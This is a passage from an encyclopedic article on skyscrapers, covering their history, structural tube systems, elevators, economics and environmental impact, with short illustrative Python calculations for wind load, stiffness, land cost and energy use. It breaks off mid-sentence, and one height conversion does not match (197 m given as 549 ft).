all-steel-framed skyscraper, while Louis Sullivan's Wainwright Building in St. Louis, Missouri, 1891, was the first steel-framed building with soaring vertical bands to emphasize the height of the building, and is therefore considered to be the first early skyscraper. In 1889, the Mole Antonelliana in Italy was 197 m (549 ft) tall. Most early skyscrapers emerged in the land-strapped areas of New York City and Chicago toward the end of the 19th century. A land boom in Melbourne, Australia, between 1888 and 1891 spurred the creation of a significant number of early skyscrapers, though none of these were steel-reinforced and few remain today. Height limits and fire restrictions were later introduced. In the late 1800s, London builders found building heights limited due to issues with existing buildings. High-rise development in London is restricted at certain sites if it would obstruct protected views of St Paul's Cathedral and other historic buildings. This policy, "St Paul's Heights", has officially been in operation since 1927.
Concerns about aesthetics and fire safety had likewise hampered the development of skyscrapers across continental Europe for the first half of the 20th century. By 1940, there were around 100 high-rise buildings in Europe. Some examples are the 1898 Witte Huis (White House) in Rotterdam; the PAST Building (1906–1908) in Warsaw; the Royal Liver Building in Liverpool, completed in 1911; the 1924 Marx House in Düsseldorf; the Borsigturm in Berlin, built in 1924; the Hansahochhaus in Cologne, Germany, built in 1925; the Kungstornen (Kings' Towers) in Stockholm, Sweden, built in 1924–25; the Ullsteinhaus in Berlin, Germany, built in 1927; the Edificio Telefónica in Madrid, Spain, built in 1929; the Boerentoren in Antwerp, Belgium, built in 1932; the Prudential Building in Warsaw, Poland, built in 1934; and the Torre Piacentini in Genoa, Italy, built in 1940. After an early competition between New York City and Chicago for the world's tallest building, New York took the lead by 1895 with the completion of the American Surety Building, leaving New York with the title of the world's tallest building for many years.
Modern skyscrapers
Modern skyscrapers are built with steel or reinforced-concrete frameworks and curtain walls of glass or polished stone. They use mechanical equipment such as water pumps and elevators. Since the 1960s, according to the CTBUH, the skyscraper has been reoriented away from being a symbol of North American corporate power toward instead communicating a city's or nation's place in the world. Skyscraper construction entered a three-decade-long era of stagnation in 1930 due to the Great Depression and then World War II. Shortly after the war ended, the Soviet Union began construction on a series of skyscrapers in Moscow. Seven, dubbed the "Seven Sisters", were built between 1947 and 1953; one of them, the main building of Moscow State University, was the tallest building in Europe for nearly four decades (1953–1990). Other skyscrapers in the style of Socialist Classicism were erected in East Germany (Frankfurter Tor), Poland (PKiN), Ukraine (Hotel Moscow), Latvia (Academy of Sciences), and other Eastern Bloc countries. Western European countries also began to permit taller skyscrapers during the years immediately following World War II. Early examples include the Edificio España (Spain) and Torre Breda (Italy). From the 1930s onward, skyscrapers began to appear in various cities in East and Southeast Asia as well as in Latin America. Finally, they also began to be constructed in cities in Africa, the Middle East, South Asia, and Oceania from the late 1950s. Skyscraper projects after World War II typically rejected the classical designs of the early skyscrapers, instead embracing the uniform international style; many older skyscrapers were redesigned to suit contemporary tastes, or even demolished, such as New York's Singer Building, once the world's tallest skyscraper. German-American architect Ludwig Mies van der Rohe became one of the world's most renowned architects in the second half of the 20th century. He conceived of the glass-façade skyscraper and, along with Norwegian Fred Severud, designed the Seagram Building in 1958, a skyscraper that is often regarded as the pinnacle of modernist high-rise architecture. Skyscraper construction surged throughout the 1960s. The impetus behind the upswing was a series of transformative innovations which made it possible for people to live and work in "cities in the sky".
In the early 1960s, Bangladeshi-American structural engineer Fazlur Rahman Khan, considered the "father of tubular designs" for high-rises, demonstrated that the rigid steel frame that had long dominated tall-building design was not the only system apt for tall buildings, marking a new era of skyscraper construction in terms of multiple structural systems. His central innovation in skyscraper design and construction was the concept of the "tube" structural system, including the "framed tube", "trussed tube", and "bundled tube". His "tube concept", using the entire exterior wall perimeter structure of a building to simulate a thin-walled tube, revolutionized tall building design. These systems allow greater economic efficiency, and also allow skyscrapers to take on various shapes, no longer needing to be rectangular and box-shaped. The first building to employ the tube structure was the DeWitt-Chestnut apartment building, considered to be a major development in modern architecture. These new designs opened an economic door for contractors, engineers, architects, and investors, providing vast amounts of real estate space on minimal plots of land. Over the next fifteen years, many towers were built by Fazlur Rahman Khan and the "Second Chicago School", including the hundred-story John Hancock Center and the massive Willis Tower. Other pioneers of this field include Hal Iyengar, William LeMessurier, and Minoru Yamasaki, the architect of the World Trade Center. Many buildings designed in the 1970s lacked a particular style and recalled ornamentation from buildings designed before the 1950s. These design plans ignored the environment and loaded structures with decorative elements and extravagant finishes. Fazlur Khan opposed this approach, considering such designs whimsical rather than rational, and, moreover, a waste of precious natural resources. Khan's work promoted structures integrated with architecture and the least use of material, resulting in the smallest impact on the environment. Modern building practices regarding supertall structures have led to the study of "vanity height". Vanity height, according to the CTBUH, is the distance between the highest floor and the architectural top (excluding antennae, flagpoles or other functional extensions). Vanity height first appeared in New York City skyscrapers as early as the 1920s and 1930s, but supertall buildings have relied on such uninhabitable extensions for, on average, 30% of their height, raising potential definitional and sustainability issues. The current era of skyscrapers focuses on sustainability and the built and natural environments, including the performance of structures, types of materials, construction practices, absolute minimal use of materials and natural resources, energy within the structure, and a holistically integrated building-systems approach. LEED is a current green building standard. Architecturally, with the movements of Postmodernism, New Urbanism and New Classical Architecture that have established themselves since the 1980s, a more classical approach has returned to global skyscraper design, and it remains popular today.
Examples are the Wells Fargo Center, NBC Tower, Parkview Square, 30 Park Place, the Messeturm, the iconic Petronas Towers and the Jin Mao Tower. Other contemporary styles and movements in skyscraper design include organic, sustainable, neo-futurist, structuralist, high-tech, deconstructivist, blob, digital, streamline, novelty, critical regionalist, vernacular, Neo Art Deco and neohistorist, also known as revivalist. 3 September is the global commemorative day for skyscrapers, called "Skyscraper Day". New York City developers competed among themselves, with successively taller buildings claiming the title of "world's tallest" in the 1920s and early 1930s, culminating with the completion of the Chrysler Building in 1930 and the Empire State Building in 1931, the world's tallest building for forty years. The first completed World Trade Center tower became the world's tallest building in 1972. However, it was overtaken by the Sears Tower (now Willis Tower) in Chicago within two years. The Sears Tower stood as the world's tallest building for 24 years, from 1974 until 1998, when it was edged out by the Petronas Twin Towers in Kuala Lumpur, which held the title for six years.
Design and construction
The design and construction of skyscrapers involves creating safe, habitable spaces in very tall buildings. The buildings must support their weight, resist wind and earthquakes, and protect occupants from fire. Yet they must also be conveniently accessible, even on the upper floors, and provide utilities and a comfortable climate for the occupants. The problems posed in skyscraper design are considered among the most complex encountered, given the balances required between economics, engineering, and construction management. One common feature of skyscrapers is a steel framework from which curtain walls are suspended, rather than load-bearing walls of conventional construction. Most skyscrapers have a steel frame that enables them to be built taller than typical load-bearing walls of reinforced concrete. Skyscrapers usually have a particularly small surface area of what are conventionally thought of as walls. Because the walls are not load-bearing, most skyscrapers are characterized by large surface areas of windows made possible by the concept of steel frame and curtain wall. However, skyscrapers can also have curtain walls that mimic conventional walls and have a small surface area of windows. The concept of a skyscraper is a product of the industrialized age, made possible by cheap fossil-fuel-derived energy and industrially refined raw materials such as steel and concrete. The construction of skyscrapers was enabled by steel frame construction, which began to surpass brick-and-mortar construction at the end of the 19th century and, together with reinforced-concrete construction, finally displaced it in the 20th century as the price of steel decreased and labor costs increased. Steel frames become inefficient and uneconomic for supertall buildings, as usable floor space is reduced by progressively larger supporting columns. Since about 1960, tubular designs have been used for high-rises. This reduces the usage of material (more efficient in economic terms: the Willis Tower uses a third less steel than the Empire State Building) yet allows greater height. It allows fewer interior columns, and so creates more usable floor space. It further enables buildings to take on various shapes. Elevators are characteristic of skyscrapers.
In 1852, Elisha Otis invented the safety elevator, allowing convenient and safe passenger movement to upper floors. Another crucial development was the use of a steel frame instead of stone or brick; otherwise, the walls on the lower floors of a tall building would be too thick to be practical. Today, major manufacturers of elevators include Otis, ThyssenKrupp, Schindler, and KONE. Advances in construction techniques have allowed skyscrapers to narrow in width while increasing in height. Some of these new techniques include mass dampers to reduce vibrations and swaying, and gaps to allow air to pass through, reducing wind shear.
Basic design considerations
Good structural design is important in most building design, but particularly for skyscrapers, since even a small chance of catastrophic failure is unacceptable given the tremendous damage such failure would cause. This presents a paradox to civil engineers: the only way to assure a lack of failure is to test for all modes of failure, in both the laboratory and the real world. But the only way to know of all modes of failure is to learn from previous failures. Thus, no engineer can be absolutely sure that a given structure will resist all loadings that could cause failure; instead, one can only have large enough margins of safety such that a failure is acceptably unlikely. When buildings do fail, engineers question whether the failure was due to some lack of foresight or due to some unknowable factor.
Loading and vibration
The load a skyscraper experiences is largely from the force of the building material itself. In most building designs, the weight of the structure is much larger than the weight of the material that it will support beyond its own weight. In technical terms, the dead load, the load of the structure, is larger than the live load, the weight of things in the structure (people, furniture, vehicles, etc.). As such, the amount of structural material required within the lower levels of a skyscraper will be much larger than the material required within higher levels. This is not always visually apparent. The Empire State Building's setbacks are actually a result of the building code at the time (the 1916 Zoning Resolution), and were not structurally required. On the other hand, the John Hancock Center's shape is uniquely the result of how it supports loads. Vertical supports can come in several types, among which the most common for skyscrapers can be categorized as steel frames, concrete cores, tube-within-tube designs, and shear walls. The wind loading on a skyscraper is also considerable. In fact, the lateral wind load imposed on supertall structures is generally the governing factor in the structural design. Wind pressure increases with height, so for very tall buildings, the loads associated with wind are larger than dead or live loads. Other vertical and horizontal loading factors come from varied, unpredictable sources, such as earthquakes.
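To make the height dependence of wind concrete, the sketch below evaluates the power-law wind profile commonly used in preliminary design, together with the resulting dynamic pressure. All inputs (reference speed, terrain exponent, air density) are assumed illustrative values, not figures from this article.

```python
# Minimal sketch, assuming a power-law wind profile: v(z) = v_ref * (z/z_ref)^alpha,
# with dynamic pressure q = 0.5 * rho * v^2. Shows why lateral wind load, not
# gravity, tends to govern the structural design of very tall buildings.
rho = 1.25      # air density, kg/m^3 (assumed)
v_ref = 25.0    # reference wind speed at 10 m, m/s (assumed storm value)
z_ref = 10.0    # reference height, m
alpha = 0.14    # power-law exponent for open terrain (assumed)

for z in (10, 100, 300, 600):
    v = v_ref * (z / z_ref) ** alpha          # wind speed at height z
    q = 0.5 * rho * v * v                     # dynamic pressure at height z
    print(f"z = {z:4d} m : wind speed {v:5.1f} m/s, dynamic pressure {q:6.0f} Pa")
```

Under these assumptions the dynamic pressure roughly doubles between 10 m and 600 m, which is why the upper reaches of a supertall tower attract disproportionately large lateral loads.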
Steel frame
By 1895, steel had replaced cast iron as skyscrapers' structural material. Its malleability allowed it to be formed into a variety of shapes, and it could be riveted, ensuring strong connections. The simplicity of a steel frame eliminated the inefficient part of a shear wall, the central portion, and consolidated support members in a much stronger fashion by allowing both horizontal and vertical supports throughout. Among steel's drawbacks is that as more material must be supported as height increases, the distance between supporting members must decrease, which in turn increases the amount of material that must be supported. This becomes inefficient and uneconomic for buildings above 40 stories tall, as usable floor space is reduced by the supporting columns and by the greater usage of steel.
Tube structural systems
A new structural system of framed tubes was developed by Fazlur Rahman Khan in 1963. The framed tube structure is defined as "a three dimensional space structure composed of three, four, or possibly more frames, braced frames, or shear walls, joined at or near their edges to form a vertical tube-like structural system capable of resisting lateral forces in any direction by cantilevering from the foundation". Closely spaced interconnected exterior columns form the tube. Horizontal loads (primarily wind) are supported by the structure as a whole. Framed tubes allow fewer interior columns, and so create more usable floor space, and about half the exterior surface is available for windows. Where larger openings like garage doors are required, the tube frame must be interrupted, with transfer girders used to maintain structural integrity. Tube structures cut down costs while allowing buildings to reach greater heights. Concrete tube-frame construction was first used in the DeWitt-Chestnut Apartment Building, completed in Chicago in 1963, and soon after in the John Hancock Center and World Trade Center. The tubular systems are fundamental to tall building design. Most buildings over 40 stories constructed since the 1960s now use a tube design derived from Khan's structural engineering principles, examples including the construction of the World Trade Center, Aon Center, Petronas Towers, Jin Mao Building, and most other supertall skyscrapers since the 1960s. The strong influence of tube-structure design is also evident in the construction of the current tallest skyscraper, the Burj Khalifa, which uses a buttressed core. Trussed tube and X-bracing: Khan pioneered several other variations of the tube structure design. One of these was the concept of X-bracing, or the trussed tube, first employed for the John Hancock Center. This concept reduced the lateral load on the building by transferring the load into the exterior columns. It also reduces the need for interior columns, thus creating more floor space. This concept can be seen in the John Hancock Center, designed in 1965 and completed in 1969. One of the most famous buildings of the structural expressionist style, the skyscraper's distinctive X-bracing exterior is actually a hint that the structure's skin is indeed part of its "tubular system". This idea is one of the architectural techniques the building used to climb to record heights (the tubular system is essentially the spine that helps the building stand upright during wind and earthquake loads). This X-bracing allows for both higher performance from tall structures and the ability to open up the inside floorplan (and usable floor space) if the architect desires. The John Hancock Center was far more efficient than earlier steel-frame structures: where the Empire State Building (1931) required about 206 kilograms of steel per square metre and 28 Liberty Street (1961) required 275, the John Hancock Center required only 145. The trussed tube concept was applied to many later skyscrapers, including the Onterie Center, Citigroup Center and Bank of China Tower.
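The efficiency gain behind those steel figures can be illustrated with a simplification: stiffness against wind-induced overturning grows with the square of each column's distance from the building's centerline, so pushing structure to the perimeter, as Khan's tube systems do, buys more stiffness per kilogram of steel. The sketch below, with an assumed square plan and unit-area columns, is illustrative only, not an analysis from this article.

```python
# Illustrative sketch (assumed geometry): comparing the bending stiffness of
# the same total column area (a) spread uniformly over the floor plan versus
# (b) concentrated on the perimeter, as in a framed tube. Stiffness against
# overturning is taken as proportional to sum(x^2) over unit-area columns,
# i.e. the second moment of area of the column group about the centreline.
import numpy as np

B = 40.0    # plan width in metres (assumed)
n = 24      # columns per grid row (assumed)

# Layout 1: columns spread uniformly over the interior on an n-by-n grid
xs = np.linspace(-B / 2, B / 2, n)
gx, gy = np.meshgrid(xs, xs)
grid_pts = np.column_stack([gx.ravel(), gy.ravel()])

# Layout 2: the same number of column units distributed around the perimeter
t = np.linspace(0.0, 4.0, grid_pts.shape[0], endpoint=False)
side, frac = np.divmod(t, 1.0)
perim_pts = np.empty_like(grid_pts)
for i, (s, f) in enumerate(zip(side.astype(int), frac)):
    edge = -B / 2 + f * B
    perim_pts[i] = [(edge, -B / 2), (B / 2, edge),
                    (-edge, B / 2), (-B / 2, -edge)][s]

def bending_stiffness(points):
    """sum(x^2) over unit-area columns: proportional to I about the y-axis."""
    return np.sum(points[:, 0] ** 2)

ratio = bending_stiffness(perim_pts) / bending_stiffness(grid_pts)
print(f"perimeter tube is ~{ratio:.1f}x stiffer for the same column area")  # ~2x
```

Even this crude model shows the perimeter layout roughly doubling the lateral stiffness obtained from the same quantity of material, which is the basic economy the tube systems exploit.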
Bundled tube: An important variation on the tube frame is the bundled tube, which uses several interconnected tube frames. The Willis Tower in Chicago used this design, employing nine tubes of varying height to achieve its distinct appearance. The bundled tube structure meant that "buildings no longer need be boxlike in appearance: they could become sculpture." Tube in tube: The tube-in-tube system takes advantage of a core shear-wall tube in addition to the exterior tube. The inner tube and outer tube work together to resist gravity loads and lateral loads and to provide additional rigidity to the structure, preventing significant deflections at the top. This design was first used in One Shell Plaza. Later buildings to use this structural system include the Petronas Towers. Outrigger and belt truss: The outrigger and belt truss system is a lateral-load-resisting system in which the tube structure is connected to the central core wall with very stiff outriggers and belt trusses at one or more levels. BHP House was the first building to use this structural system, followed by the First Wisconsin Center (since renamed U.S. Bank Center) in Milwaukee. The center rises 601 feet (183 m), with three belt trusses at the bottom, middle and top of the building. The exposed belt trusses serve both aesthetic and structural purposes. Later buildings to use this system include the Shanghai World Financial Center. Concrete tube structures: The last major buildings engineered by Khan were the One Magnificent Mile and Onterie Center in Chicago, which employed his bundled tube and trussed tube system designs respectively. In contrast to his earlier buildings, which were mainly steel, his last two buildings were concrete. His earlier DeWitt-Chestnut Apartments building, built in 1963 in Chicago, was also a concrete building with a tube structure. Trump Tower in New York City is another example that adapted this system. Shear wall frame interaction system: Khan developed the shear wall frame interaction system for mid-rise to high-rise buildings. This structural system uses combinations of shear walls and frames designed to resist lateral forces. The first building to use it was the 35-story Brunswick Building. The Brunswick Building (today known as the Cook County Administration Building) was completed in 1965 and became the tallest reinforced-concrete structure of its time. Its structural system consists of a concrete shear-wall core surrounded by an outer concrete frame of columns and spandrels. Apartment buildings up to 70 stories high have successfully used this concept.
The elevator conundrum
The invention of the elevator was a precondition for the invention of skyscrapers, given that most people would not (or could not) climb more than a few flights of stairs at a time. The elevators in a skyscraper are not simply a necessary utility, like running water and electricity, but are in fact closely related to the design of the whole structure: a taller building requires more elevators to service the additional floors, but the elevator shafts consume valuable floor space. If the service core, which contains the elevator shafts, becomes too big, it can reduce the profitability of the building. Architects must therefore balance the value gained by adding height against the value lost to the expanding service core. Many tall buildings use elevators in a non-standard configuration to reduce their footprint.
Buildings such as the former World Trade Center towers and Chicago's John Hancock Center use sky lobbies, where express elevators take passengers to upper floors which serve as the base for local elevators. This allows architects and engineers to place elevator shafts on top of each other, saving space. Sky lobbies and express elevators take up a significant amount of space, however, and add to the amount of time spent commuting between floors. Other buildings, such as the Petronas Towers, use double-deck elevators, allowing more people to fit in a single elevator and reaching two floors at every stop. It is possible to use even more than two levels on an elevator, although this has never been done. The main problem with double-deck elevators is that they cause everyone in the elevator to stop when only one person on one level needs to get off at a given floor. Buildings with sky lobbies include the World Trade Center, Petronas Twin Towers, Willis Tower and Taipei 101. The 44th-floor sky lobby of the John Hancock Center also featured the first high-rise indoor swimming pool, which remains the highest in the United States.
Economic rationale
Skyscrapers are usually situated in city centres where the price of land is high. Constructing a skyscraper becomes justified if the price of land is so high that it makes economic sense to build upward so as to minimize the cost of the land per unit of a building's total floor area. Thus the construction of skyscrapers is dictated by economics, and results in skyscrapers clustering in certain parts of a large city unless a building code restricts the height of buildings. Skyscrapers are rarely seen in small cities; they are characteristic of large cities, because of the critical importance of high land prices for skyscraper construction. Usually only office, commercial and hotel users can afford the rents in the city center, and thus most tenants of skyscrapers are of these classes. Today, skyscrapers are an increasingly common sight where land is expensive, as in the centres of big cities, because they provide such a high ratio of rentable floor space per unit area of land. Another disadvantage of very tall skyscrapers is the loss of usable floor space, as many elevator shafts are needed to enable efficient vertical travel. This led to the introduction of express lifts and sky lobbies, where passengers transfer to slower distribution lifts.
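The land-price argument above can be made concrete with a toy model: a fixed land cost spread over more floors lowers the land cost per square metre of floor space, while the construction cost per floor rises with height. The sketch below uses entirely assumed numbers (plot size, base construction cost, height premium) and is illustrative only, not an economic analysis from this article.

```python
# Toy model (all numbers assumed): the cheapest number of floors climbs as
# land gets more expensive, which is why skyscrapers cluster on costly land.
def cost_per_m2(land_price, floors, plot_m2=2000.0,
                base_build=1500.0, height_premium=15.0):
    """All-in cost per m2 of floor area. The per-floor construction cost is
    assumed to grow linearly with the floor index (extra structure, lifts)."""
    land = land_price * plot_m2
    build = sum(base_build + height_premium * f for f in range(floors)) * plot_m2
    return (land + build) / (floors * plot_m2)

for land_price in (2_000.0, 20_000.0, 100_000.0):    # $/m2 of land (assumed)
    best = min(range(1, 120), key=lambda n: cost_per_m2(land_price, n))
    print(f"land at ${land_price:>9,.0f}/m2 -> cheapest at {best:3d} floors")
```

Under these assumptions the cost-minimizing height grows roughly with the square root of the land price, capturing in miniature why tall buildings only pay off on expensive plots.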
Environmental impact
Constructing a single skyscraper requires large quantities of materials like steel, concrete, and glass, and these materials represent significant embodied energy. Skyscrapers are thus material- and energy-intensive buildings. Skyscrapers have considerable mass, requiring a stronger foundation than a shorter, lighter building would. Building materials must also be lifted to the top of a skyscraper during construction, requiring more energy than would be necessary at lower heights. Furthermore, a skyscraper consumes much electricity because potable and non-potable water have to be pumped to the highest occupied floors, skyscrapers are usually designed to be mechanically ventilated, elevators are generally used instead of stairs, and electric lights are needed in rooms far from the windows and in windowless spaces such as elevators, bathrooms and stairwells. Skyscrapers can be artificially lit, and the energy requirements can be covered by renewable energy or other electricity generation with low greenhouse-gas emissions. Heating and cooling of skyscrapers can be efficient because of centralized HVAC systems, heat-radiation-blocking windows, and the small surface area of the building. There is Leadership in Energy and Environmental Design (LEED) certification for skyscrapers. For example, the Empire State Building received a gold LEED rating in September 2011, making it the tallest LEED-certified building in the United States and showing that skyscrapers can be environmentally friendly. The Gherkin in London, United Kingdom, is another example of an environmentally friendly skyscraper. In the lower levels of a skyscraper, a larger percentage of the building floor area must be devoted to the building structure and services than is required for lower buildings:
More structure, because it must be stronger to support more floors above.
The elevator conundrum creates the need for more lift shafts: everyone comes in at the bottom, and they all have to pass through the lower part of the building to get to the upper levels.
Building services: power and water enter the building from below and have to pass through the lower levels to get to the upper levels.
In low-rise structures, the support rooms (chillers, transformers, boilers, pumps and air-handling units) can be put in basements or roof space, areas which have low rental value. There is, however, a limit to how far this plant can be located from the area it serves. The farther away it is, the larger the risers for ducts and pipes from this plant to the floors they serve, and the more floor area these risers take. In practice this means that in high-rise buildings this plant is located on "plant levels" at intervals up the building.
Operational energy
The building sector accounts for approximately 50% of greenhouse gas emissions, with operational energy accounting for 80–90% of building-related energy use. Operational energy use is affected by the magnitude of conduction between the interior and exterior, convection from infiltrating air, and radiation through glazing. The extent to which these factors affect the operational energy varies depending on the microclimate of the skyscraper, with increased wind speeds as the height of the skyscraper increases and a decrease in the dry-bulb temperature as the altitude increases. For example, in a study of the Freedom Tower in New York City, moving from 1.5 meters to 284 meters saw the dry-bulb temperature decrease by 1.85 °C while the wind speed increased from 2.46 meters per second to 7.75 meters per second, which led to a 2.4% decrease in summer cooling. However, for the same building it was found that the annual energy use intensity was 9.26% higher, because the lack of shading at high altitudes increased the cooling loads for the remainder of the year; a combination of temperature, wind, shading, and the effects of reflections led to a combined 13.13% increase in annual energy use intensity. In a study performed by Leung and Ray in 2013, it was found that the average energy use intensity of a structure with between 0 and 9 floors was approximately 80 kBtu/ft²/yr, while the energy use intensity of a structure with more than 50 floors was about 117 kBtu/ft²/yr. Refer to Figure 1 to see the breakdown of how intermediate heights affect the energy use intensity.
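As a quick back-of-envelope check on the Leung and Ray figures just cited, the sketch below computes the relative increase and converts both intensities to SI units; the two intensities are the values quoted above, and the unit conversion is standard.

```python
# Sketch: relative increase and SI conversion of the cited energy use
# intensities (80 kBtu/ft2/yr for 0-9 floors vs 117 for 50+ floors).
KBTU_PER_FT2_TO_KWH_PER_M2 = 3.155   # 1 kBtu/ft2 ~= 3.155 kWh/m2

low_rise, high_rise = 80.0, 117.0    # kBtu/ft2/yr, from the study cited above
increase = (high_rise - low_rise) / low_rise * 100
print(f"tall buildings use ~{increase:.0f}% more energy per unit floor area")
print(f"low-rise : {low_rise * KBTU_PER_FT2_TO_KWH_PER_M2:6.0f} kWh/m2/yr")
print(f"high-rise: {high_rise * KBTU_PER_FT2_TO_KWH_PER_M2:6.0f} kWh/m2/yr")
```

Per unit of floor area, the tallest category in that study therefore uses roughly 46% more operational energy than the low-rise category.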
The slight decrease in energy use intensity over 30 to 39 floors can be attributed to the fact that the increase in pressure within the heating, cooling, and water distribution systems levels out at a point between 40 and 49 floors, allowing the energy savings from the microclimate of higher floors to become visible. There is a gap in the data; another study examining the same measures for taller buildings is needed.
Elevators
A portion of the operational energy increase in tall buildings is related to the usage of elevators, because the distance traveled and the speed at which they travel increase as the height of the building increases. Between 5 and 25% of the total energy consumed in a tall building is from the use of elevators. Elevator operation also becomes less efficient as building height increases, because of higher drag and friction losses.
Embodied energy
The embodied energy associated with the construction of skyscrapers varies based on the materials used. Embodied energy is quantified per unit of material. Skyscrapers inherently have higher embodied energy than low-rise buildings due to the increase in material used as more floors are built. Figures 2 and 3 compare the total embodied energy of different floor types and the unit embodied energy per floor type for buildings with between 20 and 70 stories. For all floor types except steel-concrete floors, it was found that after 60 stories there was a decrease in unit embodied energy; when considering all floors, however, there was exponential growth due to a double dependence on height. The first dependence is that greater height increases the quantity of materials used; the second is that greater height increases the size of elements needed to provide the building's structural capacity. A careful choice of building materials can likely reduce the embodied energy without reducing the number of floors constructed within the bounds presented.
Embodied carbon
Similar to embodied energy, the embodied carbon of a building depends on the materials chosen for its construction. Figures 4 and 5 show the total embodied carbon for different structure types for increasing numbers of stories, and the embodied carbon per square meter of gross floor area for the same structure types as the number of stories increases. Both methods of measuring embodied carbon show that there is a point where the embodied carbon is lowest before increasing again as the height increases. For total embodied carbon, the minimum depends on the structure type but falls at either around 40 stories or approximately 60 stories. Per square meter of gross floor area, the lowest embodied carbon was found at either 40 stories or approximately 70 stories.
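Calculations like those behind Figures 4 and 5 generally follow a simple bill-of-materials pattern: sum each material's mass multiplied by a per-material emission factor. The sketch below shows that pattern; the emission factors and per-floor quantities are assumed, illustrative values, not data from the studies referenced above.

```python
# Generic LCA-style sketch (all factors and quantities assumed/illustrative):
# embodied carbon = sum over materials of (mass * emission factor).
EMISSION_FACTORS = {        # kgCO2e per kg of material (assumed typical values)
    "steel":    1.85,
    "concrete": 0.12,
    "glass":    1.40,
}

def embodied_carbon(bill_of_materials):
    """bill_of_materials: {material: mass in kg} -> total kgCO2e."""
    return sum(EMISSION_FACTORS[m] * kg for m, kg in bill_of_materials.items())

# Hypothetical quantities for one floor plate of a tall office building:
floor = {"steel": 120_000, "concrete": 900_000, "glass": 15_000}
total = embodied_carbon(floor)
print(f"~{total / 1000:,.0f} tCO2e per floor under these assumptions")
```

Because the structural quantities per floor themselves grow with total height, repeating this calculation floor by floor reproduces the height-dependent minima described above.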
Air pollution
In urban areas, the configuration of buildings can lead to exacerbated wind patterns and an uneven dispersion of pollutants. When the height of buildings surrounding a source of air pollution is increased, the size and occurrence of both "dead zones" (areas with almost no pollutants) and "hotspots" (areas with high concentrations of pollutants) increase. Figure 6 depicts the progression of Building F's height increasing from 0.0315 units in Case 1, to 0.2 units in Case 2, to 0.6 units in Case 3. This progression shows that as the height of Building F increases, the dispersion of pollutants decreases, but the concentration within the building cluster increases. The velocity fields can also be altered by the construction of new buildings, rather than solely by the increase in height shown in the figure. As urban centers continue to expand upward and outward, the present velocity fields will continue to trap polluted air close to the tall buildings within the city. Within major cities specifically, a majority of air pollution is derived from transportation, whether it be cars, trains, planes, or boats. As urban sprawl continues and pollutants continue to be emitted, air pollutants will continue to be trapped within these urban centers. Different pollutants can be detrimental to human health in different ways. For example, particulate matter from vehicular exhaust and power generation can cause asthma, bronchitis, and cancer, while nitrogen dioxide from motor-engine combustion processes can cause neurological dysfunction and asphyxiation.
LEED/green building rating
As with all other buildings, if special measures are taken to incorporate sustainable design methods early on in the design process, it is possible to obtain a green building rating, such as Leadership in Energy and Environmental Design (LEED) certification. An integrated design approach is crucial in making sure that design decisions that positively impact the whole building are made at the beginning of the process. Because of the massive scale of skyscrapers, the design team must take all factors into account, including the building's impact on the surrounding community, its effect on the direction in which air and water move, and the impact of the construction process. There are several design methods that could be employed in the construction of a skyscraper to take advantage of the height of the building. The microclimates that exist as the height of the building increases can be exploited to increase natural ventilation, decrease the cooling load, and increase daylighting. Natural ventilation can be increased by utilizing the stack effect, in which warm air moves upward and increases the movement of the air within the building. If utilizing the stack effect, buildings must take extra care to design for fire separation, as the stack effect can also exacerbate the severity of a fire. Skyscrapers are considered to be internally dominated buildings because of their size, as well as the fact that a majority are used as office buildings with high cooling loads. Due to the microclimate created at the upper floors, with increased wind speed and decreased dry-bulb temperatures, the cooling load will naturally be reduced through infiltration across the thermal envelope. By taking advantage of the naturally cooler temperatures at higher altitudes, skyscrapers can reduce their cooling loads passively. On the other side of this argument is the lack of shading at higher altitudes by other buildings, so the solar heat gain will be larger for higher floors than for floors at the lower end of the building. Special measures should be taken to shade upper floors from sunlight during the overheated period to ensure thermal comfort without increasing the cooling load.
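The stack effect mentioned above follows a standard pressure relation: warm indoor air is less dense than cold outdoor air, so a connected air column of height h develops a driving pressure roughly proportional to h and to the indoor-outdoor temperature difference. The sketch below evaluates that relation; the density and temperatures are assumed illustrative values.

```python
# Minimal sketch of the stack-effect pressure (standard relation, assumed
# inputs): delta_p = rho_out * g * h * (1 - T_out / T_in), treating air as an
# ideal gas so density scales inversely with absolute temperature. The same
# pressure that drives natural ventilation can also drive smoke spread in a fire.
G = 9.81          # gravitational acceleration, m/s^2
RHO_OUT = 1.29    # outdoor air density near 0 C, kg/m^3 (assumed)

def stack_pressure(height_m, t_in_k, t_out_k):
    """Pressure difference across a connected air column of the given height."""
    return RHO_OUT * G * height_m * (1.0 - t_out_k / t_in_k)

for h in (50, 150, 400):
    dp = stack_pressure(h, t_in_k=294.0, t_out_k=273.0)   # 21 C inside, 0 C out
    print(f"{h:3d} m column: ~{dp:5.1f} Pa of stack pressure")
```

Taller connected air paths (atria, stair and lift shafts) therefore generate proportionally larger driving pressures, which is why fire separation deserves the extra care noted above.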
History of the tallest skyscrapers At the beginning of the 20th century, New York City was a center for the Beaux-Arts architectural movement, attracting the talents of such great architects as Stanford White and Carrere and Hastings. As better construction and engineering technology became available as the century progressed, New York City and Chicago became the focal point of the competition for the tallest building in the world. Each city's striking skyline has been composed of numerous and varied skyscrapers, many of which are icons of 20th-century architecture: The E. V. Haughwout Building in Manhattan was the first building to successfully install a passenger elevator, doing so on 23 March 1857. The Equitable Life Building in Manhattan was the first office building to feature passenger elevators. The Home Insurance Building in Chicago, which was built in 1884, was the first tall building with a steel skeleton. The Singer Building, an expansion of an existing structure in Lower Manhattan, was the world's tallest building when completed in 1908. Designed by Ernest Flagg, it was 612 feet (187 m) tall. The Metropolitan Life Insurance Company Tower, across Madison Square Park from the Flatiron Building, was the world's tallest building when completed in 1909. It was designed by the architectural firm of Napoleon LeBrun & Sons and stood 700 feet (213 m) tall. The Woolworth Building, a neo-Gothic "Cathedral of Commerce" overlooking New York City Hall, was designed by Cass Gilbert. At 792 feet (241 m), it became the world's tallest building upon its completion in 1913, an honor it retained until 1930. 40 Wall Street, a 71-story neo-Gothic tower designed by H. Craig Severance, was the world's tallest building for a month in May 1930. The Chrysler Building in New York City took the lead in late May 1930 as the tallest building in the world, reaching 1,046 feet (319 m). Designed by William Van Alen as an Art Deco masterpiece with an exterior crafted of brick, the Chrysler Building continues to be a favorite of New Yorkers to this day. The Empire State Building, nine blocks south of the Chrysler Building in Manhattan, topped out at 1,250 feet (381 m) and 102 stories in 1931. The first building to have more than 100 floors, it was designed by Shreve, Lamb and Harmon in the contemporary Art Deco style and takes its name from the nickname of New York State. The antenna mast added in 1951 brought the pinnacle height to 1,472 feet (449 m), lowered in 1984 to 1,454 feet (443 m). The World Trade Center officially surpassed the Empire State Building in 1970, was completed in 